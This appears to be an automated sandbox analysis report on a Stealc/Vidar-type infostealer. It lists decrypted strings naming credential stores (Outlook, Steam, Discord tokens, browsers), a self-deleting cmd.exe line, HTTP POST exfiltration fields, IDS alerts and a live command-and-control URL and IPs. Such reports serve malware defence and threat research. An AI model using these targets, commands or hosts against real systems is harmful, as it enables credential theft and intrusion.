                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: *.tox
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: *.ini
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Password
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: 00000001
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: 00000002
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: 00000003
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: 00000004
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: \Outlook\accounts.txt
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Pidgin
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: \.purple\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: accounts.xml
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: dQw4w9WgXcQ
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: token:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Software\Valve\Steam
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: SteamPath
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: \config\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: ssfn*
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: config.vdf
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: DialogConfig.vdf
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: DialogConfigOverlay*.vdf
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: libraryfolders.vdf
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: loginusers.vdf
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: \Steam\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: sqlite3.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: browsers
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: done
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: soft
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: \Discord\tokens.txt
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: https
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: POST
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: HTTP/1.1
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: Content-Disposition: form-data; name="
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: hwid
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: build
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: token
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: file_name
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: file
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: message
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack String decryptor: screenshot.jpg
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe Code function: 2_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,2_2_00409540
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe Code function: 2_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,2_2_004155A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe Code function: 2_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,2_2_00406C10
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe Code function: 2_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_004094A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe Code function: 2_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,2_2_0040BF90
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C756C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,2_2_6C756C80

                            Exploits

                            Source: Yara match File source: 6.2.UniversalInstaller.exe.3bbe15b.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 5.2.UniversalInstaller.exe.34ec86d.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 21.2.cmd.exe.4dca976.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 20.2.UniversalInstaller.exe.373b15b.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 7.2.cmd.exe.53ab264.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 5.2.UniversalInstaller.exe.3530d5b.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 21.2.cmd.exe.4e0ee64.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 20.2.UniversalInstaller.exe.373bd5b.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 5.2.UniversalInstaller.exe.353015b.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 21.2.cmd.exe.4e0e264.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 20.2.UniversalInstaller.exe.36f786d.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 6.2.UniversalInstaller.exe.3bbed5b.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 7.2.cmd.exe.5367976.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 7.2.cmd.exe.53abe64.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 6.2.UniversalInstaller.exe.3b7a86d.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000015.00000002.2752594150.0000000004DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 00000014.00000002.2531256823.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: UniversalInstaller.exe PID: 6532, type: MEMORYSTR
                            Source: Yara match File source: Process Memory Space: UniversalInstaller.exe PID: 7120, type: MEMORYSTR
                            Source: Yara match File source: Process Memory Space: cmd.exe PID: 4456, type: MEMORYSTR

                            Compliance

                            Source: C:\Users\user\Desktop\4BfhCycV4B.exe Unpacked PE file: 0.2.4BfhCycV4B.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exe Unpacked PE file: 2.2.u3z0.0.exe.400000.0.unpack
                            Source: 4BfhCycV4B.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49716 version: TLS 1.0
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
                            Source: unknown HTTPS traffic detected: 185.93.1.244:443 -> 192.168.2.5:49726 version: TLS 1.2
                            Source: Binary string: mozglue.pdbP source: u3z0.0.exe, 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                            Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: nss3.pdb@ source: u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3303896392.0000013E35A30000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3304143080.0000013E35A40000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3304143080.0000013E35A40000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: wntdll.pdbUGP source: Qg_Appv5.exe, 00000004.00000002.2304402051.0000000005370000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2302387380.0000000005019000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244478392.000000000361C000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244765590.0000000003970000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308649628.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308799655.0000000004100000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2309045975.00000000045B6000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2529875595.0000000004FB7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530363582.0000000005490000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.2752444597.0000000004A17000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: Qg_Appv5.exe, 00000004.00000002.2304402051.0000000005370000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2302387380.0000000005019000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244478392.000000000361C000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244765590.0000000003970000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308649628.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308799655.0000000004100000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2309045975.00000000045B6000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2529875595.0000000004FB7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530363582.0000000005490000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.2752444597.0000000004A17000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: mozglue.pdb source: u3z0.0.exe, 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007071000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2242409589.00000000004EC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000000.2235272008.00000000004EC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000006.00000000.2240945975.000000000110C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000006.00000002.2307212182.000000000110C000.00000002.00000001.01000000.00000010.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: y:C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: 4BfhCycV4B.exe, 00000000.00000003.2057767194.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000000.2055726673.000000000040F000.00000002.00000001.01000000.00000005.sdmp
                            Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000006EE0000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3303653067.0000013E35A20000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000006BD2000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2245242883.000000006C267000.00000002.00000001.01000000.0000000F.sdmp, UniversalInstaller.exe, 00000006.00000002.2309485282.000000006C267000.00000002.00000001.01000000.00000011.sdmp
                            Source: Binary string: C:\yokirew38_tidamikip hopoyura.pdb source: 4BfhCycV4B.exe, 00000000.00000000.2014790341.000000000040F000.00000002.00000001.01000000.00000003.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2264464647.0000000004330000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: 4BfhCycV4B.exe, 00000000.00000003.2057767194.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000000.2055726673.000000000040F000.00000002.00000001.01000000.00000005.sdmp
                            Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: nss3.pdb source: u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3303896392.0000013E35A30000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: 0C:\yokirew38_tidamikip hopoyura.pdb source: 4BfhCycV4B.exe, 00000000.00000000.2014790341.000000000040F000.00000002.00000001.01000000.00000003.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2264464647.0000000004330000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0041D9E1 FindFirstFileExA,0_2_0041D9E1
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0421DC48 FindFirstFileExA,0_2_0421DC48
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00412570
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040D1C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004015C0 LocalAlloc,FindFirstFileA,StrCmpCA,StrCmpCA,SetThreadLocale,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_004015C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_00411650
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B610
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040DB60
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00411B80
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D540
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_004121F0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                            Networking

                            Source: TrafficSnort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.5:49705 -> 185.172.128.90:80
                            Source: TrafficSnort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49708 -> 185.172.128.76:80
                            Source: TrafficSnort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49708 -> 185.172.128.76:80
                            Source: TrafficSnort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.76:80 -> 192.168.2.5:49708
                            Source: TrafficSnort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49708 -> 185.172.128.76:80
                            Source: TrafficSnort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.76:80 -> 192.168.2.5:49708
                            Source: Malware configuration extractorURLs: http://185.172.128.76/3cd2b41cbde8fc9c.php
                            Source: global trafficTCP traffic: 91.215.85.66 ports 9000,1,4,5,6,7,15647
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e4ff10000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3514d525.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e35198739.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3517432f.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: global trafficTCP traffic: 192.168.2.5:49738 -> 91.215.85.66:15647
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Apr 2024 07:27:58 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Tue, 23 Apr 2024 07:15:01 GMTETag: "52200-616be4ffa1b6b"Accept-Ranges: bytesContent-Length: 336384Content-Type: application/x-msdos-program
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Apr 2024 07:13:06 GMTContent-Type: application/octet-streamContent-Length: 8538160Last-Modified: Mon, 22 Apr 2024 21:57:43 GMTConnection: keep-aliveETag: "6626dd57-824830"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytes
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:02 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytes
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:07 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytes
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:09 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytes
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:09 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytes
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Apr 2024 07:28:10 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytes
